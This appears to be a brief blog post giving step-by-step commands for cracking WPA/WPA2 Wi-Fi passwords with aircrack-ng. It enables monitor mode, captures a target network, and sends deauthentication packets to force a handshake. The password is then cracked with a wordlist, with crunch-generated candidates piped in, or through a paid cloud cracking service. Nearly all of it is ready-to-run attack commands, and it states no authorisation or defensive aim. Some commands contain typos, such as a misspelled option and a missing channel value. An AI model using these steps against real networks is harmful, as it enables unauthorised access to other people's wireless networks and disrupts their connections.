1. start airmon-ng
airmon-ng start wlan0
2. monitor the wifi and keep it running!
airodump-ng -c 3 -w capturefile --bbsid targetbssid --ivs mon0
ex,
airodump-ng -c -w mytarget --bssid 00:11:22:33:44:55 --ivs mon0
3. open new terminal.
aireplay-ng -0 1 -a targetbssid -c yourmacaddress mon0
ex,
aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0
4. crack the code!! There's a lot of options how to do it. mostly you will need word dictionary.
a. using aircrack-ng
aircrack-ng -w yourworddictionary yourtargetivsfile
ex,
aircrack-ng -w /pentest/password/john/password.lst mytarget-01.ivs
b. crunch. download from http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
install and use it like this,
/pentest/password/crunch/crunch/crunch 8 16 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng yourtargetivsfile -b targetbssid -w -
ex,
/pentest/password/crunch/crunch/crunch 8 16 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng mytarget-01.ivs -b 00:11:22:33:44:55 -w -
this method will run 2 commands in the same time. CAUTION: crunch will create dictionary from 8-16 password length and will use alpha, numeric all all chars. It can be around > 30 GB!
c. using cloud services. hacking WPA/WPA2 is need more effort and killer machine for decoding the password. therefore if you don't have time or enough resources. you can use cloud services.
go to, http://www.cloudcracker.com
upload your handshake file, it could be your *.cap file and put your target SSID. then just follow the wizard. CAUTION: this services is not FREE!! You must pay for it!!
No comments:
Post a Comment